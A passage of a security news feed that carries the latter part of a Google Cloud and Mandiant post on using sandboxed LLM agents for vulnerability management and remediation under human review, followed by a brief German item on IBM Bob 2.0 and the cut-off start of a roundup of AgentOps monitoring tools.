    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image1.max-1000x1000.png" alt="Demystifying AI image1">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="u6hlz">Figure 1: Visual representation of an isolated AI agent environment using SAIF mechanisms</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>By operationalizing these tools within frameworks that demand verifiable integrity and structural resilience, organizations can safely bridge the gap between AI velocity and enterprise defense.</span></p>
<h3><span>The need for human-led threat modeling</span></h3>
<p><span>While LLMs excel at identifying syntax patterns, source code itself rarely contains the full picture of unwritten business intent. Some organizations attempt to solve this by connecting LLM agents to internal wikis, design documents, and issue trackers using retrieval-augmented generation (RAG).</span></p>
<p><span>While RAG gives the model access to external business context, it is not a perfect fix. Corporate documentation is frequently stale, contradictory, or incomplete. An AI agent might retrieve an outdated architecture diagram and confidently hallucinate a secure path that no longer exists in production. Because LLM agents struggle to resolve conflicting, undocumented human assumptions, human-led threat modeling remains a critical security control across both legacy applications and modern agent workflows.</span></p>
<p><span>Security teams should apply threat modeling during both the pre-build system design phase to establish a secure foundation, and during post-build architecture reviews. While an AI agent might successfully identify a poorly configured internal endpoint locally, a human threat modeler asks the structural question: </span><span>why does that microservice possess broad database read permissions in the first place?</span><span> </span></p>
<p><span>Identifying architectural vulnerabilities requires reasoning about business risk, data sensitivity, and operational constraints. To structure this process, organizations can use industry frameworks like PASTA (Process for Attack Simulation and Threat Analysis) or service offerings like the </span><a href="https://services.google.com/fh/files/misc/ds-threat-modeling-security-service-en.pdf" rel="noopener" target="_blank"><span>Mandiant Threat Modeling Security Service</span></a><span> to map trust boundaries, uncover structural design flaws, and prioritize compensating controls. Securing fundamental architecture through human oversight is a necessary component when relying on automated agents to find bugs in a poorly designed system.</span></p>
<p><span>Once these AI agents are safely sandboxed, as guided by SAIF, and the architecture is verified through threat modeling, organizations can typically apply them to two different problem spaces: Enterprise Vulnerability Management (to assist in managing the volume of known CVEs in commercial off-the-shelf (COTS) software and infrastructure) and Product Security (to identify vulnerabilities in 1st-party (1P) code).</span></p>
<h3><span>Track 1: Enterprise Vulnerability Management</span></h3>
<h4><span>Foundational security and discovery </span></h4>
<p><span>While the second track of this post explores how AI agents can uncover complex zero-days in custom code, organizations should manage the scale of enterprise infrastructure in tandem with these AI deployments. Even as new AI capabilities dominate headlines, organizations should still address foundational security challenges, such as secrets sprawl, unmanaged service accounts, missing FIDO2 MFA, and legacy VPN concentrators. Although vulnerability exploitation was the primary initial infection vector in intrusions Mandiant investigated last year, threat actors consistently rely on missing foundational controls and unpatched edge devices to secure and escalate their foothold after exploiting a vulnerability.</span></p>
<p><span>Furthermore, AI cannot replace foundational visibility. As security teams deploy AI agents, they should simultaneously close these tactical entry points by maximizing dynamic discovery capabilities like External Attack Surface Management (EASM), Cloud Security Posture Management (CSPM), and Continuous Threat Exposure Management (CTEM). In hybrid and cloud environments, tools like </span><a href="https://cloud.google.com/wiz?e=48754805"><span>Wiz</span></a><span> can be used to map this initial footprint.</span></p>
<h3><span>Risk-based vulnerability management </span></h3>
<p><span>Vulnerability management teams are already overwhelmed by the current volume of findings generated by traditional scanners. As organizations scale dynamic discovery tools, such as EASM, CSPM and CTEM, alongside automated AI agents, this influx of findings will compound the problem. To manage this influx, telemetry from these diverse discovery methods must first be normalized and deduplicated. This normalized data serves two purposes: it feeds directly into the risk engine, and it acts as a live overlay to correct stale records in the configuration management database (CMDB). By evaluating the deduplicated vulnerabilities alongside this newly updated asset context and frontline threat intelligence, the RBVM engine calculates a custom risk score that allows security teams to dynamically prioritize remediation.</span></p>
<p><span>A mature RBVM methodology calculates a customized risk score on a 0 to 100 scale using a weighted average. A sample formula for calculating this risk-based score is:</span></p>
<p><span>Final Score = (W_1 * S_vuln) + (W_2 * S_asset) + (W_3 * S_threat)</span></p>
<p><span>The variables and weights (W) are customized to the organization's risk appetite (for example, 0.20 for vulnerability, 0.40 for asset, and 0.40 for threat, summing to 1.0), while the underlying variables (S) are scored on a 0 to 100 scale and defined as follows:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Vulnerability severity (S_vuln): </strong><span>The inherent technical severity of the flaw. This is calculated by taking the CVSS Base Score (which natively accounts for confidentiality, integrity, and availability impact) and multiplying it by 10.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Asset context (S_asset): </strong><span>A combined metric of exposure and data sensitivity. Scores range from 100 for internet-facing assets holding customer data, down to 25 for internal-only assets with no sensitive data. To translate this impact into monetary terms for non-technical stakeholders, organizations can incorporate Factor Analysis of Information Risk (FAIR) principles into this metric. However, this approach requires highly accurate, continuously updated financial data that many enterprises struggle to maintain at scale.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Threat context (S_threat): </strong><span>The real-world urgency of the vulnerability. Scores range from 100 if actively exploited by threat actors relevant to the organization's profile, 75 if a proof-of-concept exists or if it is a vulnerability class easily exploited by autonomous AI agents, down to 25 if the exploit is theoretical and highly complex. Organizations should also map the Exploit Prediction Scoring System (EPSS) probability percentage directly into this variable. This allows the threat score to automatically scale up or down as real-world exploitation telemetry shifts, aligning static vulnerability data with active threat intelligence.</span></p>
</li>
</ul>
<p><span>An asset's customized risk score should directly influence internal remediation service-level agreements (SLAs), unless external compliance-driven mandates, such as CISA Binding Operational Directives (BODs), or relevant equivalents, override internal prioritization. A risk-driven and threat-intelligence-driven vulnerability prioritization methodology will help organizations focus resources on managing and mitigating the most critical security vulnerabilities first. This is an area where LLMs can support the vulnerability management process, particularly by helping teams synthesize unstructured threat intelligence to surface relevant risk contexts more efficiently. Enforcing strict SLOs for patching, while requiring formal risk acceptance documentation for any patching exceptions, will help reduce the number of vulnerabilities available to threat actors and increase the visibility of outstanding risks across the organization. Furthermore, organizations should integrate RBVM data directly into their security orchestration, automation, and response (SOAR) platforms for automated alert enrichment.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image5.max-1000x1000.png" alt="Demystifying AI image5">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ce5s1">Figure 2: Integration points of a risk-based vulnerability management (RBVM) program.</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Containment and Observability</span></h3>
<p><span>Modern architecture blueprints must prioritize attack surface reduction under the assumption that vulnerabilities will inevitably be exploited. Moving away from traditional perimeter defenses, organizations should align with zero trust principles, ensuring that security boundaries are established around every asset, workload, and identity.</span></p>
<p><span>A component of this alignment is the implementation of strong authentication principles. Organizations should eliminate implicit trust by enforcing continuous, context-aware authentication and authorization. Utilizing Zero Trust Network Access (ZTNA) solutions, such as Identity-Aware Proxies (IAP), shields critical management interfaces (e.g., SSH, RDP) and internal systems from direct internet exposure, granting access only to verified identities and compliant devices.</span></p>
<p><span>For public-facing applications and APIs, attack surface reduction involves deploying Layer 7 inspection at the load balancer or API gateway level. This hardening layer enforces strict schema validation, intercepting and neutralizing malformed inbound traffic and potential exploits before they can interact with internal application logic.</span></p>
<p><span>Securing the software supply chain is equally vital in modern blueprints, and organizations should align with frameworks like </span><a href="https://slsa.dev/spec/v0.1/levels" rel="noopener" target="_blank"><span>Supply-chain Levels for Software Artifacts (SLSA)</span></a><span> across both dependency and build tracks. Security policies should mandate that third-party dependencies are routed through a centralized artifact repository equipped with automated curation services, such as </span><a href="https://cloud.google.com/security/products/assured-open-source-software"><span>Google Assured Open Source Software (OSS)</span></a><span> or an equivalent solution, preventing untrusted code from entering the development lifecycle. Furthermore, maturing toward advanced SLSA build levels (e.g., SLSA level 3) through the implementation of isolation, ephemerality and reproducibility requirements via  ephemeral compute infrastructure for CI/CD runners reduces the likelihood of attacker persistence by ensuring environments are short-lived and automatically cycled.</span></p>
<p><span>To complement these pre-build controls, runtime observability should be established across all production workloads. This requires monitoring both infrastructure-level behavior and the specific runtime libraries actively executing in production, which surfaces true exploitable risk far beyond a static Software Bill of Materials. In tandem with monitoring workloads, organizations should secure how they authenticate by implementing workload identity federation. By removing static credentials and instead using short-lived tokens backed by strong cryptographic identity verification, organizations can reduce the risk of credential theft and unauthorized lateral movement.</span></p>
<p><span>Within the internal environment, microsegmentation should be enforced to break down flat networks into granular security zones. Routing application traffic through a Secure Access Service Edge (SASE) architecture integrates network routing directly with robust identity controls, rendering internal services completely invisible to unauthenticated users and containing threats to their initial point of entry.</span></p>
<p><span>Finally, automated containment and incident response within a zero trust framework must rely on deterministic, auditable tooling. Endpoint detection and response (EDR) platforms and SOAR playbooks should handle high-fidelity containment tasks through hardcoded execution logic. While AI tools accelerate triage and policy recommendation, actual execution capabilities must remain restricted to well-defined, pre-tested workflows to maintain total architectural predictability.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image8.max-1000x1000.png" alt="Demystifying AI image8">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ak3zc">Figure 3: Structural containment and observability architecture</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Track 2: Product Security &amp; Development (1P Code)</span></h3>
<h4><span>Deterministic and probabilistic tooling</span></h4>
<p><span>Integrating LLM agents into vulnerability management and security workflows requires recognizing the differences between deterministic and probabilistic tooling. Traditional SAST and DAST tools utilize fixed methodologies to evaluate vulnerabilities through structural code parsing or definitive runtime observations. LLMs, however, evaluate source code by processing tokens simultaneously to calculate statistical and semantic relationships, rather than tracing deterministic execution tracks.</span></p>
<p><span>While techniques like Chain of Thought (CoT) prompting allow models to bridge this gap by decomposing complex code paths into intermediate reasoning steps, this process remains bounded by architectural limitations. Even when a model possesses a context window large enough to ingest entire repositories, it may experience attention degradation across long inputs, often failing to correctly weight intervening validation or sanitization logic within the prompt. For example, if a variable is tainted on line 10 but sanitized on line 500, attention degradation can cause the model to lose track of the sanitization logic. Furthermore, when enterprise codebases require chunking to fit within context limits, the resulting fragmentation may cause the model to lose track of end-to-end data flows.</span></p>
<p><span>Consequently, probabilistic engines are effective at uncovering localized, static anomalies, such as hardcoded credentials or outdated dependencies, but frequently misjudge complex vulnerabilities split across fragmented chunks or extended context windows. Notable exceptions occur when these probabilistic models are coupled with deterministic feedback loops. For instance, when analyzing C++ memory corruption, an LLM can be equipped with a test harness to iteratively execute code and definitively prove a crash. While these dynamic validation applications are detailed in subsequent sections, the baseline limitation for static analysis across standard enterprise codebases remains: models struggle to consistently evaluate dispersed logic.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image4.max-1000x1000.png" alt="Demystifying AI image4">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ak3zc">Figure 4: Deterministic SAST scanners vs. probabilistic LLMs</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Binary and architectural oracles</span></h3>
<p><span>Many security programs are moving toward agent workflows where an agent autonomously spins up a test environment and uses tools to execute payloads and verify its findings. This is a promising approach, but it is important to understand where it is most effective.</span></p>
<p><span>Agent workflows perform well against bug classes with binary and observable oracles, meaning the system provides an objective, 'crash or no crash' feedback loop. For example, if a model is hunting for memory corruption in a C++ kernel, a successful exploit is undeniable: the payload executes, and a resulting crash definitively proves the vulnerability. This explains why the industry is currently seeing a surge in AI-discovered vulnerabilities across memory-unsafe targets like web browsers and operating systems.</span></p>
<p><span>However, enterprise software is heavily dominated by vulnerabilities that require architectural oracles for validation. Vulnerabilities like authorization bypasses, complex business logic flaws, and indirect server-side request forgeries require an understanding of business context and cross-service trust boundaries. If an agent's payload fails to produce a clear outcome, it can't reliably distinguish whether the vulnerability is a hallucination or if it simply constructed the payload incorrectly. An agent's malformed payload might even crash an unrelated background process and cause the model to hallucinate a success and report a false confirmation. Complex enterprise architecture contains unwritten business intent that a probabilistic engine can't inherently know.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image3.max-1000x1000.png" alt="Demystifying AI image3">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="bg92b">Figure 5: Evaluating vulnerabilities against binary vs. architectural oracles</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Targeted deployment and human impact</span></h3>
<p><span>Organizations adopting LLMs for vulnerability discovery face a massive staffing challenge. LLMs can generate findings significantly faster than human engineers can triage them. If every LLM-generated alert requires manual review, security teams will quickly face burnout and/or suffer alarm fatigue.</span></p>
<p><span>Rather than indiscriminately pointing agents at all available codebases and risking an influx of unverified output, security teams need a selective deployment strategy. Mature programs should maintain SAST and DAST for baseline hygiene and deterministic rule enforcement, and reserve intensive agent audits for high-impact components with clear binary oracles.</span></p>
<p><span>Organizations can prioritize agent audits on systems where the technology's strengths align with the broader risk profile:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Memory-unsafe codebases:</strong><span> Legacy or high-performance components written in memory-unsafe languages such as C, C++, or Assembly are strong candidates for LLM audits. These languages are susceptible to memory corruption flaws, such as buffer overflows and use-after-free conditions. Because these vulnerabilities trigger definitive failure states like segmentation faults, they work well with automated sandboxes where agents can compile the code with memory sanitizers and write proof-of-concept inputs. This approach is also effective for auditing the native extensions where safe languages call unsafe internal libraries, such as Python C extensions or the Java Native Interface (JNI).</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Systems highly exposed to outside content:</strong><span> First-party data ingestion pipelines, custom API gateways, or proprietary edge proxies. A prerequisite here is direct access to the source code, this strategy is strictly for internally developed or fully open-source codebases where the organization can inspect the logic. Because these systems directly parse untrusted internet traffic, targeting their source code for LLM-driven audits yields the highest risk-reduction ROI.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Shared internal libraries and utilities: </strong><span>Core serialization/deserialization packages, common utility functions, and custom middleware wrappers (such as internal message-queue parsers) maintained in-house. Because the enterprise owns the source code for these shared building blocks, agent tools can easily hook into them within automated test harnesses to fuzz inputs and catch low-level logic or parsing bugs with high fidelity.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Foundational security boundaries:</strong><span> Internally developed centralized authentication services, custom OAuth providers, and internal credential brokers. While testing complex identity boundaries generates higher logic-based noise, having full access to the source code allows teams to pair agents with deterministic checks to safely triage findings, given that the blast radius of an authentication failure justifies the human effort.</span></p>
</li>
</ul>
<p><span>To filter the noise generated by LLMs, organizations should establish routing rules. Require the agent to generate a fully reproducible, deterministic test harness (such as a compiled binary or a Python test script) that attempts to prove the exploit. This harness must execute automatically in an isolated, monitored sandbox. If the sandbox execution fails (due to a syntax error or a failed exploit), the ticket is discarded, sparing human resources. However, organizations should enforce execution timeouts and iteration limits on these test harnesses. Without hard limits, an autonomous agent attempting to prove a vulnerability can fall into an infinite loop: writing a script, failing, rewriting, and failing again, exhausting API token budgets and compute resources against a single dead-end vulnerability, creating significant cost overruns without advancing the security review. To manage these expenses, organizations should incorporate FinOps principles to balance the compute and API costs of LLM audits against the traditional expenses of manual triage.</span></p>
<p><span>However, a successful execution in the sandbox does not guarantee an actionable, high-priority risk. In practice, autonomous agents frequently produce working PoCs for genuine technical flaws that are ultimately irrelevant; or warrant a lower remediation priority within the context of the system's threat model. For example, the agent might successfully exploit an unreachable dead-code path, or trigger a bug that requires administrative access to execute and yields no further escalation of privilege. Therefore, a human engineer should be assigned to review and prioritize the ticket only if the sandbox registers a successful execution, validating environmental context, reachability, and true business impact as part of the review.</span></p>
<p><span>This workflow reduces the volume of alerts, but it is important to understand that the security team's workload does not disappear. The engineer's primary job shifts from manually hunting for the initial vulnerability to auditing the LLM-generated proof to ensure it represents a meaningful risk rather than an unexploitable or contextually irrelevant finding. Leadership should properly staff and train teams for this new reality. Deploying LLM agents does not remove the need for skilled practitioners; it redirects their workload toward complex validation. Equally important is training teams to recognize the risk of false negatives. A hyper-focus on filtering AI-generated noise can create a false sense of security. If an exploit relies on a novel technique or a zero-day vulnerability that was not heavily weighted in the model's training data, the agent will likely scan right past it in silence. LLMs augment discovery, but they do not guarantee exhaustive coverage.</span></p>
<p><span>When integrating LLMs into SAST triage pipelines, human engineers should also verify the broader architectural integrity. Prompting an LLM with specific SAST warnings can induce contextual narrowing, where the agent becomes hyper-fixated on resolving a localized syntax error and misses broader architectural flaws existing in the same file. Furthermore, if the agent's mandate extends beyond discovery to automated remediation (such as writing and proposing code fixes), this human-in-the-loop validation becomes critical to ensure the LLM does not inadvertently introduce new regressions or bypass intended business logic.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image_20.max-1000x1000.png" alt="Demistiying Image 6 New">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="bg92b">Figure 6: Flowchart outlining the targeted LLM deployment and triage workflow.</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Remediation and hardening</span></h3>
<h4><span>LLM-assisted code remediation</span></h4>
<p><span>A primary goal of integrating large language models (LLMs) into the software development lifecycle is automated remediation. To achieve this, organizations are deploying these capabilities through two primary execution methods: directly within the integrated development environment (IDE) or as a centralized pipeline runner. Examples include </span><a href="https://deepmind.google/blog/introducing-codemender-an-ai-agent-for-code-security/" rel="noopener" target="_blank"><span>CodeMender</span></a><span>, although as of time of writing, it is not publicly available.</span></p>
<h4><strong>IDE-integrated method</strong><span> </span></h4>
<p><span>This method shifts remediation as far left as possible by operating as an active pair-programmer. Tools running continuous static analysis in the background of the IDE surface vulnerabilities directly to the developer via editor diagnostics like inline indicators or hover tooltips.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Localized scope:</strong><span> The developer can trigger the LLM agent to analyze the localized data flow and generate a targeted patch (such as implementing parameterized SQL queries). By constraining the LLM to localized, syntax-level fixes, the scope of the change remains contained. This prevents the agent from attempting sprawling, multi-file refactors that frequently break complex architectural logic.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Human-in-the-loop:</strong><span> The developer reviews the AI-generated patch before the code is committed.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Managing false positives:</strong><span> Local IDE agents allow developers to manage false positives dynamically. Suppressing alerts anchored to specific line text reduces alert fatigue and preserves developer trust.</span></p>
</li>
</ul>
<h4><strong>CI/CD runner method</strong><span> </span></h4>
<p><span>The runner method executes asynchronously within the CI/CD pipeline to use an LLM to review committed code and automatically propose remediation.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Restricted execution and deterministic validation: </strong><span>Asking a centralized runner to automatically rewrite a complex, multi-file authorization flaw directly in the main branch introduces a high risk of breaking logic errors. To mitigate this, agents must be restricted to generating pull requests (PRs). Once a PR is generated, it must automatically execute standard regression suites alongside the deterministic test harness. By rerunning the initial PoC against the patched code, the workflow repurposes the exploit script as a validation oracle to prove the vulnerability has been remediated. A human engineer then reviews the PR to validate the architectural logic before merging.</span></p>
</li>
</ul>
<p><span>In all cases security teams should define a clear boundary between the two methods rather than rely on a single approach. IDE agents provide immediate, syntax-level support. They catch and resolve low-complexity errors locally before developers commit code. Centralized CI/CD runners handle broader organizational baselines. They propose complex, repository-wide fixes for vulnerabilities that bypass local environments.</span></p>
<h4><strong>Post-deployment controls</strong><span> </span></h4>
<p><span>Even with human review and deterministic test harnesses, AI-generated patches can still introduce logic regressions in production. Organizations should implement strict post-deployment controls:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Automated rollbacks:</strong><span> Treating LLM-generated code with the same post-deployment scrutiny as any major architectural change ensures that if an unforeseen regression traverses the CI/CD pipeline, the environment can revert to a known good state.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Mitigating model drift:</strong><span> Relying on managed AI services introduces the ongoing risk of model drift. To prevent silent weight updates from breaking test harnesses, organizations need to pin specific model API versions to frozen releases. When a pinned version reaches its end-of-life, organizations will face a forced migration. Mitigating this pipeline fragility requires combining model pinning with deterministic regression suites.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Compliance and auditability:</strong><span> If an AI agent automatically closes a security ticket or generates a patch in the CI/CD pipeline, organizations should maintain immutable audit logs to satisfy frameworks like SOC 2 ,PCI-DSS, FedRAMP, and CMMC. National security deployments must also account for data sovereignty requirements. This logging should record the specific model version that proposed the fix, the deterministic test results that validated it, and the human engineer who approved the merge. Furthermore, because emerging legislation like the EU AI Act emphasizes human oversight for high-risk applications, security teams should carefully evaluate how autonomous remediation workflows align with these evolving global regulatory standards.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Screenshot_2026-07-15_at_10.24.22PM.max-1000x1000.png" alt="demistifying image 7">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="bg92b">Figure 7: Flowchart demonstrating the difference between local IDE AI remediation and centralized CI/CD pipeline remediation.</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Conclusion</span></h3>
<p><span>Leveraging LLMs in vulnerability management is a multi-layer solution: Integrating it requires separating workflows by layer. At the enterprise infrastructure level, Risk-Based Vulnerability Management (RBVM) and exposure management are necessary to process the volume of findings and configuration drift. At the product and code security level, LLM-enabled vulnerability assessment and remediation must operate alongside foundational deterministic controls, such as SAST and DAST, to audit custom, open-source, or third-party code.</span></p>
<p><span>Although LLMs can help manage technical debt and accelerate vulnerability discovery, they do not replace secure-by-design principles. The fact that LLM agents are proving exceptionally capable at identifying and exploiting localized memory corruption in memory-unsafe codebases, alongside other primary vectors, should serve as a wake-up call. </span></p>
<p><span>As a long-term strategy aligned with </span><a href="https://media.defense.gov/2022/Nov/10/2003112742/-1/-1/0/CSI_SOFTWARE_MEMORY_SAFETY.PDF" rel="noopener" target="_blank"><span>NSA guidance on Software Memory Safety</span></a><span>, organizations need to phase memory-safe languages into new internal development. LLMs are beginning to expand what is possible here by reducing the manual labor required for code migration. Converting existing C or C++ codebases to Rust has historically been unrealistic due to the large volume of engineering hours needed. While fully automated translation is not a turn-key solution, using LLMs to assist engineers with the bulk of the conversion can make these long-term migrations operationally viable. Beyond internal efforts, organizations should use procurement requirements to incentivize vendors to reduce their reliance on memory-unsafe languages and establish secure configuration defaults over time. Bridging the gap between AI velocity and enterprise defense means building an automated pipeline to manage the current backlog, while architecting systems where entire classes of vulnerabilities and misconfigurations are eliminated by design.</span></p>
<h3><span>Acknowledgements</span></h3>
<p><span>This analysis would not have been possible without the assistance of Google Threat Intelligence Group (GTIG) and other broader Google teams.</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[KI-Assistent Bob 2.0 modernisiert IBM Z und Power-Systeme]]></title>
<description><![CDATA[IBM Bob 2.0 soll auch Jahrzehnte alten Code verstehen und modernisieren können – mit KI-Agenten und Premium-Paketen für Z, i und Java.]]></description>
<link>https://tsecurity.de/de/3673178/it-nachrichten/ki-assistent-bob-20-modernisiert-ibm-z-und-power-systeme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673178/it-nachrichten/ki-assistent-bob-20-modernisiert-ibm-z-und-power-systeme/</guid>
<pubDate>Thu, 16 Jul 2026 13:03:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[IBM Bob 2.0 soll auch Jahrzehnte alten Code verstehen und modernisieren können – mit KI-Agenten und Premium-Paketen für Z, i und Java.]]></content:encoded>
</item>
<item>
<title><![CDATA[19 AgentOps tools for monitoring AI activity, issues, and costs]]></title>
<description><![CDATA[With AI increasingly tucked into every cranny of the enterprise, someone has had to step up and provide the tools necessary to discover, track, and monitor all the agents and LLMs and keep them humming along in their various workflows. Thankfully, the DevOps world answered the call, building the ...]]></description>
<link>https://tsecurity.de/de/3673038/it-security-nachrichten/19-agentops-tools-for-monitoring-ai-activity-issues-and-costs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673038/it-security-nachrichten/19-agentops-tools-for-monitoring-ai-activity-issues-and-costs/</guid>
<pubDate>Thu, 16 Jul 2026 12:09:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">With AI increasingly tucked into every cranny of the enterprise, someone has had to step up and provide the tools necessary to discover, track, and monitor all the agents and LLMs and keep them humming along in their various workflows. Thankfully, the DevOps world answered the call, building the tools to support our new overlords in an emerging subdiscipline interchangeably called “<a href="https://www.cio.com/article/196239/what-is-aiops-injecting-intelligence-into-it-operations.html">AIOps</a>,” “AgentOps,” and sometimes “agent observability.”</p>



<p class="wp-block-paragraph">Many of the challenges involved in AgentOps are similar to those tackled by traditional DevOps tools and processes. After all, at their foundation, LLMs are just software running on hardware somewhere. Typical issues involving RAM and disk space are just as important in the agent world, maybe more so because AI operations are even more greedy about consuming storage than regular software is.</p>



<p class="wp-block-paragraph">Many of the companies supporting agent observability are big names in DevOps circles, having adapted their stacks to address the idiosyncrasies of modern LLMs. IT teams maintaining enterprise agents can treat the LLMs as just one node in a big graph filled with services that are constantly swapping packets and triggering software jobs. Latency and resource constraints must be managed because end-users don’t care whether it’s an LLM, a database, or a plain-old Python script that’s failing, bringing their work to a grinding halt.</p>



<p class="wp-block-paragraph">But new AI-specific challenges are opening the door to newcomers that are building tools with the peculiarities of LLMs in mind — for example, keeping deeper logs filled with records of prompts. LLMs are also often very non-deterministic by design, making it trickier to pinpoint failure modes. And then there’s the fact that an agent will give a perfectly intelligent answer one minute and hallucinate the next.</p>



<p class="wp-block-paragraph">Relying on many of the same approaches that DevOps tools do, AgentOps tools watch for misbehavior and flag anything out of the ordinary for deeper analysis. This may be as simple as fixing slow responses, but it can also include AI hallucinations and other issues born of LLMs’ non-determanism.</p>



<p class="wp-block-paragraph">Teams trying to choose which agent observability tools is best for their use case should look at the size and nature of their agentic systems and projects. Are they adding AI agent features to an existing product or application, or are they building agentic systems from scratch? Are they more focused on maintaining a stable LLM operation or iterating on new approaches? Is AI the center of attention or just an add-on that’s meant to improve an existing stack?<br><br>The AgentOps and agent observability options listed below share many of the same features but differ in their focus and their attention to the challenges organizations will encounter when incorporating agents into their stacks. Each tool offers a worthwhile place to start understanding how to care for the growing presence of AI in the production world.</p>



<h2 class="wp-block-heading">AgentOps.ai</h2>



<p class="wp-block-paragraph">When teams of agents work together, tracking the conversations are essential for understanding and debugging what’s happening. The SDK from <a href="http://agentops.ai/">AgentOps.ai records</a> events so that the creators can replay past behavior to track details such as token counts, spending, latency, and more. Available as a service and on-premises.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> <a href="https://www.agentops.ai/#pricing">Starts at $40 per month </a>plus usage costs at $0.20 per 1M tokens</p>



<p class="wp-block-paragraph"><em>Standout feature:</em> Replay analytics with “time-travel debugging”</p>



<p class="wp-block-paragraph"><em>Best suited for:</em> Complex agent debugging</p>



<h2 class="wp-block-heading">Arize Phoenix</h2>



<p class="wp-block-paragraph">Debugging prompts and LLM responses requires a nuanced understanding of just what’s happening, in part because of the non-determinism that often enters the process. <a href="https://arize.com/phoenix/">Phoenix</a> from Arize supports this process with robust tracing and the ability to score the results for more precise iteration. Their system can track the results and tool calls from a variety of major platforms (Anthropic, AWS, OpenAI, etc.) that are initiated by the major frameworks (LangChain, LlamaIndex, DSPy, etc.). The result is insight into what data is triggering what chain of responses.</p>



<p class="wp-block-paragraph"><em>Pricing:</em> Small free tier; <a href="https://arize.com/pricing/">Pro plan</a> starts at $50 per month plus costs tied to events</p>



<p class="wp-block-paragraph"><em>Standout feature:</em> LLM-as-a-Judge metrics for tracking quality</p>



<p class="wp-block-paragraph"><em>Best suited for:</em> Teams focusing on iterating for accuracy and quality</p>



<h2 class="wp-block-heading">BigPanda</h2>



<p class="wp-block-paragraph"><a href="https://www.bigpanda.io/">BigPanda</a> has always offered solutions for tracking performance of complex systems. Now the company is drilling deeper into the challenge of detecting and ending the problems that come from models that go awry. BigPanda’s main system relies on historical data and machine learning algorithms to flag issues. Its own agent layer connects the problematic nodes and errant models while dispatching alerts to the right team members.</p>



